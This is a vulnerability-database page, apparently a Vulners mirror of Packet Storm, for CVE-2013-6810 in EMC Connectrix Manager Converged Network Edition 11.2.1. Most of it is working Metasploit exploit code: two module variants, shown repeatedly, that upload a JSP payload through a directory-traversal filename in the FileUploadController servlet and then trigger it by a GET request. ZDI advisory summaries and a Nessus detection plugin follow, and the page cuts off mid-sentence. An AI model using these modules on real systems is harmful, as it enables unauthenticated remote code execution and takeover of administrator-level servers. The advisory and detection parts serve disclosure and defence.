Search...

EMC CMCNE 11.2.1 FileUploadController Remote Code Execution

2017-09-14T00:00:00

ID PACKETSTORM:144149
Type packetstorm
Reporter James Fitts
Modified 2017-09-14T00:00:00

Description

                                        
                                            `require 'msf/core'  
  
class MetasploitModule &lt; Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' =&gt; 'EMC CMCNE FileUploadController Remote Code Execution',  
'Description' =&gt; %q{  
This module exploits a fileupload vulnerability found in EMC  
Connectrix Manager Converged Network Edition &lt;= 11.2.1. The file  
upload vulnerability is triggered when sending a specially crafted  
filename to the FileUploadController servlet. This allows the  
attacker to upload a malicious jsp file to anywhere on the remote  
file system.  
},  
'License' =&gt; MSF_LICENSE,  
'Author' =&gt; [ 'james fitts' ],  
'References' =&gt;  
[  
[ 'ZDI', '13-279' ],  
[ 'CVE', '2013-6810' ]  
],  
'Privileged' =&gt; true,  
'Platform' =&gt; 'win',  
'Arch' =&gt; ARCH_JAVA,  
'Targets' =&gt;  
[  
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],  
],  
'DefaultTarget' =&gt; 0,  
'DisclosureDate' =&gt; 'Dec 18 2013'))  
  
register_options([  
Opt::RPORT(80)  
], self.class)  
end  
  
def exploit  
  
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"  
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"  
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")  
@jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"  
  
data = Rex::MIME::Message.new  
data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")  
data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")  
  
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")  
  
print_status("#{peer} - Uploading the JSP Payload...")  
res = send_request_cgi({  
'method' =&gt; 'POST',  
'uri' =&gt; normalize_uri("HttpFileUpload", "FileUploadController.do"),  
'ctype' =&gt; "multipart/form-data; boundary=#{data.bound}",  
'data' =&gt; post_data  
})  
  
if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/  
print_good("File uploaded successfully!")  
print_status("Executing '#{@jsp_name}' now...")  
  
res = send_request_cgi({  
'method' =&gt; 'GET',  
'uri' =&gt; normalize_uri("dcm-client", "#{@jsp_name}")  
})  
  
else  
print_error("Does not look like the files were uploaded to #{peer}...")  
end  
  
  
end  
  
end  
  
`

JSON Vulners Source

Initial Source

{"href": "https://packetstormsecurity.com/files/144149/EMC-CMCNE-11.2.1-FileUploadController-Remote-Code-Execution.html", "history": [], "id": "PACKETSTORM:144149", "reporter": "James Fitts", "published": "2017-09-14T00:00:00", "description": "", "title": "EMC CMCNE 11.2.1 FileUploadController Remote Code Execution", "bulletinFamily": "exploit", "type": "packetstorm", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'EMC CMCNE FileUploadController Remote Code Execution', \n'Description' => %q{ \nThis module exploits a fileupload vulnerability found in EMC \nConnectrix Manager Converged Network Edition <= 11.2.1. The file \nupload vulnerability is triggered when sending a specially crafted \nfilename to the FileUploadController servlet. This allows the \nattacker to upload a malicious jsp file to anywhere on the remote \nfile system. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'james fitts' ], \n'References' => \n[ \n[ 'ZDI', '13-279' ], \n[ 'CVE', '2013-6810' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 18 2013')) \n \nregister_options([ \nOpt::RPORT(80) \n], self.class) \nend \n \ndef exploit \n \npeer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\" \ndeploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\" \njsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\") \n@jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\" \n \ndata = Rex::MIME::Message.new \ndata.add_part(\"#{jsp}\", \"application/octet-stream\", nil, \"form-data; name=\\\"source\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\") \ndata.add_part(\"#{rand_text_alpha_upper(5)}\", nil, nil, \"form-data; name=\\\"driverFolderName\\\"\") \n \npost_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\") \n \nprint_status(\"#{peer} - Uploading the JSP Payload...\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(\"HttpFileUpload\", \"FileUploadController.do\"), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data \n}) \n \nif res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/ \nprint_good(\"File uploaded successfully!\") \nprint_status(\"Executing '#{@jsp_name}' now...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(\"dcm-client\", \"#{@jsp_name}\") \n}) \n \nelse \nprint_error(\"Does not look like the files were uploaded to #{peer}...\") \nend \n \n \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "hash": "7e69df752f3978a2431cf3c9a28b66b6e7cee4f56d50afa3200cd386e9d1c307", "references": [], "edition": 1, "sourceHref": "https://packetstormsecurity.com/files/download/144149/emccmcne1121-fileupload.rb.txt", "cvelist": ["CVE-2013-6810"], "lastseen": "2017-09-15T10:22:49", "viewCount": 7, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-6810"]}, {"type": "nessus", "idList": ["HP_B-SERIES_SAN_NETWORK_ADVISOR_LINUX_12_1_1.NASL", "HP_B-SERIES_SAN_NETWORK_ADVISOR_12_1_1.NASL"]}, {"type": "zdi", "idList": ["ZDI-13-282", "ZDI-13-283", "ZDI-13-278", "ZDI-13-279", "ZDI-13-280", "ZDI-13-281"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30170", "SECURITYVULNS:VULN:13490", "SECURITYVULNS:DOC:30176"]}, {"type": "zdt", "idList": ["1337DAY-ID-28542", "1337DAY-ID-28541"]}, {"type": "exploitdb", "idList": ["EDB-ID:42701", "EDB-ID:42702"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144150"]}, {"type": "seebug", "idList": ["SSV:61148"]}], "modified": "2017-09-15T10:22:49"}, "vulnersScore": 9.3}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "915f63be4a9c0dc82cdf7f553debbbb6"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b7e6eb5e71115a022b1db47c895a9cd5"}, {"key": "modified", "hash": "7b92cbcb0288dfd5b22d1836cee56bf2"}, {"key": "published", "hash": "7b92cbcb0288dfd5b22d1836cee56bf2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "61794ed1242043bed45422ff58a8e793"}, {"key": "sourceData", "hash": "8739e1eeb47b89831cf03e042e4d25a6"}, {"key": "sourceHref", "hash": "80a2a424ebcb61f9eb77f3f2dafc372d"}, {"key": "title", "hash": "18d33ed20881c08023bfb94887d5eb3c"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "objectVersion": "1.3", "modified": "2017-09-14T00:00:00"}

{"cve": [{"lastseen": "2017-09-16T19:12:18", "bulletinFamily": "NVD", "description": "The server in Brocade Network Advisor before 12.1.0, as used in EMC Connectrix Manager Converged Network Edition (CMCNE), HP B-series SAN Network Advisor, and possibly other products, allows remote attackers to execute arbitrary code by using a servlet to upload an executable file.", "modified": "2017-09-15T21:29:00", "published": "2013-12-12T12:55:03", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6810", "id": "CVE-2013-6810", "title": "CVE-2013-6810", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:04", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to read arbitrary text files on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within one of the pages served as part of the immservlets which allows an unauthenticated user to read an arbitrary text file anywhere on the system. An attacker can use this to either disclose sensitive data, or to disclose information about the server that can be used in a subsequent attack.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-282", "id": "ZDI-13-282", "title": "EMC Connectrix Manager Converged Network Edition inmservlets.war Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:07", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the 'FileUploadController' servlet, which allows an unauthenticated user to read or write an arbitrary file anywhere on the system. An attacker can leverage this directory traversal vulnerability into arbitrary code execution on the compromised server in the security context of the Administrator account.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-280", "id": "ZDI-13-280", "title": "EMC Connectrix Manager Converged Network Edition inmservlets.war FileUploadController Servlet Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:55", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the 'FileUploadController' servlet, which allows an unauthenticated user to upload an arbitrary file anywhere on the system. An attacker can leverage this directory traversal vulnerability into arbitrary code execution on the compromised server in the security context of the Administrator account.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-279", "id": "ZDI-13-279", "title": "EMC Connectrix Manager Converged Network Edition FileUploadController Servlet Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:56", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the 'SoftwareFileUploadMoreInfoServlet', which allows an unauthenticated user to copy any file to an arbitrary location on the server. When combined with information disclosure vulnerabilities, an attacker can leverage this directory traversal vulnerability into arbitrary code execution on the compromised server in the security context of the Administrator account.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-283", "id": "ZDI-13-283", "title": "EMC Connectrix Manager Converged Network Edition inmservlets.war SoftwareFileUploadMoreInfoServlet Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:02", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the 'UnifiedFileUploadMoreInfoServlet', which allows an unauthenticated user to copy any file to an arbitrary location on the server. When combined with information disclosure vulnerabilities, an attacker can leverage this directory traversal vulnerability into arbitrary code execution on the compromised server in the security context of the Administrator account.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-281", "id": "ZDI-13-281", "title": "EMC Connectrix Manager Converged Network Edition inmservlets.war UnifiedFileUploadMoreInfoServlet Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of EMC Connectrix Manager Converged Network Edition. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the 'BootFileUploadMoreInfoServlet', which allows an unauthenticated user to copy any file to an arbitrary location on the server. When combined with information disclosure vulnerabilities, an attacker can leverage this directory traversal vulnerability into arbitrary code execution on the compromised server in the security context of the Administrator account.", "modified": "2013-11-09T00:00:00", "published": "2013-12-18T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-278", "id": "ZDI-13-278", "title": "EMC Connectrix Manager Converged Network Edition inmservlets.war BootFileUploadMoreInfoServlet Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:38:07", "bulletinFamily": "exploit", "description": "Bugtraq ID:64242\r\nCVE ID:CVE-2013-6810\r\n\r\nEMC Connectrix\u662f\u4e00\u6b3e\u7f51\u7edc\u4ea4\u6362\u673a\u89e3\u51b3\u65b9\u6848\uff0cEMC Connectrix Manager\u63d0\u4f9bConnectrix server\u7684\u63a5\u53e3\uff0c\u53ef\u5bf9\u8bbe\u5907\u8fdb\u884c\u7ba1\u7406\u548c\u4fdd\u62a4\u3002\r\n\r\nEMC Connectrix Manager\u4e0d\u6b63\u786e\u9650\u5236\u5bf9\u67d0\u4e9bServlet\u7684\u8bbf\u95ee\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u63d0\u4ea4\u7279\u6b8a\u7684\u8bf7\u6c42\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u6587\u4ef6\u4fe1\u606f\uff0c\u64cd\u4f5c\u6570\u636e\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nEMC Connectrix Manager 12.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nEMC\r\n-----\r\nEMC Connectrix Manager Converged Network Edition (CMCNE) 12.1.2\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttps://support.emc.com/products/23304_Connectrix-Manager-Converged-Network-Edition\r\nhttps://support.emc.com/downloads/120_Connectrix", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61148", "id": "SSV:61148", "type": "seebug", "title": "EMC Connectrix Manager Converged Network Edition\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-09-13T20:42:27", "bulletinFamily": "exploit", "description": "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit). CVE-2013-6810. Remote exploit for Java platform. Tags: Metasploit Framework", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "EDB-ID:42702", "href": "https://www.exploit-db.com/exploits/42702/", "type": "exploitdb", "title": "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a fileupload vulnerability found in EMC\r\n\t\t\t\tConnectrix Manager Converged Network Edition <= 11.2.1. The file\r\n\t\t\t\tupload vulnerability is triggered when sending a specially crafted\r\n\t\t\t\tfilename to the FileUploadController servlet. This allows the\r\n\t\t\t\tattacker to upload a malicious jsp file to anywhere on the remote\r\n\t\t\t\tfile system.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'james fitts' ],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'ZDI', '13-279' ],\r\n\t\t\t\t\t[ 'CVE', '2013-6810' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'Platform' \t=> 'win',\r\n\t\t\t'Arch'\t=> ARCH_JAVA,\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 18 2013'))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(80)\r\n\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tpeer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n\t\tdeploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\"\r\n\t\tjsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\")\r\n\t\t@jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\"\r\n\r\n\t\tdata = Rex::MIME::Message.new\r\n data.add_part(\"#{jsp}\", \"application/octet-stream\", nil, \"form-data; name=\\\"source\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\")\r\n\t\tdata.add_part(\"#{rand_text_alpha_upper(5)}\", nil, nil, \"form-data; name=\\\"driverFolderName\\\"\")\r\n\r\n\t\tpost_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\")\r\n\r\n\t\tprint_status(\"#{peer} - Uploading the JSP Payload...\")\r\n\t\tres = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(\"HttpFileUpload\", \"FileUploadController.do\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n })\r\n\r\n\t\tif res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/\r\n print_good(\"File uploaded successfully!\")\r\n\t\t\tprint_status(\"Executing '#{@jsp_name}' now...\")\r\n\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method'\t=> 'GET',\r\n\t\t\t\t'uri'\t\t=> normalize_uri(\"dcm-client\", \"#{@jsp_name}\")\r\n\t\t\t})\r\n\r\n else\r\n print_error(\"Does not look like the files were uploaded to #{peer}...\")\r\n end\r\n\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42702/"}, {"lastseen": "2017-09-13T20:42:24", "bulletinFamily": "exploit", "description": "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit). CVE-2013-6810. Remote exploit for Java platform. Tags: Metasploit...", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "EDB-ID:42701", "href": "https://www.exploit-db.com/exploits/42701/", "type": "exploitdb", "title": "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a file upload vulnerability found in EMC \r\n\t\t\t\tConnectrix Manager Converged Network Edition <= 11.2.1. The file\r\n\t\t\t\tupload vulnerability is triggered when sending a specially crafted\r\n\t\t\t\tfilename to the FileUploadController servlet found within the \r\n\t\t\t\tInmservlets.war archive. This allows the attacker to upload a\r\n\t\t\t\tspecially crafted file which leads to remote code execution in the\r\n\t\t\t\tcontext of the server user.\r\n\t\t\t},\r\n\t\t\t'Author'\t\t => [ 'james fitts' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'ZDI', '13-280' ],\r\n\t\t\t\t\t[ 'CVE', '2013-6810' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'Platform' \t=> 'win',\r\n\t\t\t'Arch'\t=> ARCH_JAVA,\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 18 2013'))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(80)\r\n\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tpeer = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\r\n\t\tdeploy = \"..\\\\..\\\\..\\\\deploy\\\\dcm-client.war\\\\\"\r\n\t\tjsp = payload.encoded.gsub(/\\x0d\\x0a/, \"\").gsub(/\\x0a/, \"\")\r\n\t\t@jsp_name = \"#{rand_text_alphanumeric(4 + rand(32-4))}.jsp\"\r\n\r\n\t\tdata = Rex::MIME::Message.new\r\n\t\tdata.add_part(\"#{jsp}\", nil, nil, \"form-data; name=\\\"ftproot\\\"; filename=\\\"#{deploy}#{@jsp_name}\\\"\")\r\n\r\n\t\tpost_data = data.to_s.gsub(/^\\r\\n\\-\\-\\_Part\\_/, \"--_Part_\")\r\n\r\n\t\tprint_status(\"#{peer} - Uploading the JSP Payload...\")\r\n\t\tres = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(\"inmservlets\", \"FileUploadController\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n\t\t\t'headers'\t=> {\r\n\t\t\t\t'ROOTDIR'\t=> \"ftproot\"\r\n\t\t\t}\r\n })\r\n\r\n\t\tif res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/\r\n\t\t\tprint_good(\"File uploaded successfully!\")\r\n\t\t\tprint_status(\"Executing '#{@jsp_name}' now...\")\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method'\t=> 'GET',\r\n\t\t\t\t'uri'\t\t=> normalize_uri(\"dcm-client\", \"#{@jsp_name}\")\r\n\t\t\t})\r\n\t\telse\r\n\t\t\tprint_error(\"Does not look like the files were uploaded to #{peer}...\")\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42701/"}], "nessus": [{"lastseen": "2019-02-21T01:20:42", "bulletinFamily": "scanner", "description": "The version of HP B-series SAN Network Advisor on the remote Windows host is a version prior to 12.1.1. As such, it is affected by a remote code execution vulnerability. \n\nIt should be noted that while the associated references report on a remote code execution vulnerability in EMC Connectrix Manager Converged Network Edition, HP B-series SAN Network Advisor is the same product under an HP name and is, therefore, also affected. Moreover, the issue is actually due to a third-party product from Brocade.", "modified": "2018-11-15T00:00:00", "id": "HP_B-SERIES_SAN_NETWORK_ADVISOR_12_1_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72177", "published": "2014-01-28T00:00:00", "title": "HP B-series SAN Network Advisor < 12.1.1 Remote Code Execution (Windows)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72177);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2013-6810\");\n script_bugtraq_id(64242);\n\n script_name(english:\"HP B-series SAN Network Advisor < 12.1.1 Remote Code Execution (Windows)\");\n script_summary(english:\"Checks version of HP B-series SAN Network Advisor\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP B-series SAN Network Advisor on the remote Windows\nhost is a version prior to 12.1.1. As such, it is affected by a remote\ncode execution vulnerability. \n\nIt should be noted that while the associated references report on a\nremote code execution vulnerability in EMC Connectrix Manager\nConverged Network Edition, HP B-series SAN Network Advisor is the same\nproduct under an HP name and is, therefore, also affected. Moreover,\nthe issue is actually due to a third-party product from Brocade.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-278/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-279/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-280/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-281/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-282/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-283/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://attrition.org/pipermail/vim/2014-January/002755.html\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04045640\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f70e4bba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530357/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to HP B-series SAN Network Advisor 12.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:b_series_san_network_advisor\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_b-series_san_network_advisor_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/hp_b-series_san_network_advisor/Installed\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"HP B-series SAN Network Advisor\";\nkb_base = \"SMB/hp_b-series_san_network_advisor/\";\n\npath = get_kb_item_or_exit(kb_base + \"Path\");\nver = get_kb_item_or_exit(kb_base + \"Version\");\n\nif (ver !~ \"^[0-9.]+$\") exit(1, \"The version of \"+appname+\" (\"+ver+\") is not entirely numeric numeric.\");\n\nfix = \"12.1.1\";\nmin = \"12.0.0\";\nif (ver_compare(ver:ver, fix:min, strict:FALSE) >= 0 && ver_compare(ver:ver, fix:fix, strict:FALSE) == -1)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:20:42", "bulletinFamily": "scanner", "description": "The version of HP B-series SAN Network Advisor on the remote Linux host is a version prior to 12.1.1. As such, it is affected by a remote code execution vulnerability. \n\nIt should be noted that while the associated references report on a remote code execution vulnerability in EMC Connectrix Manager Converged Network Edition, HP B-series SAN Network Advisor is the same product under an HP name and is, therefore, also affected. Moreover, the issue is actually due to 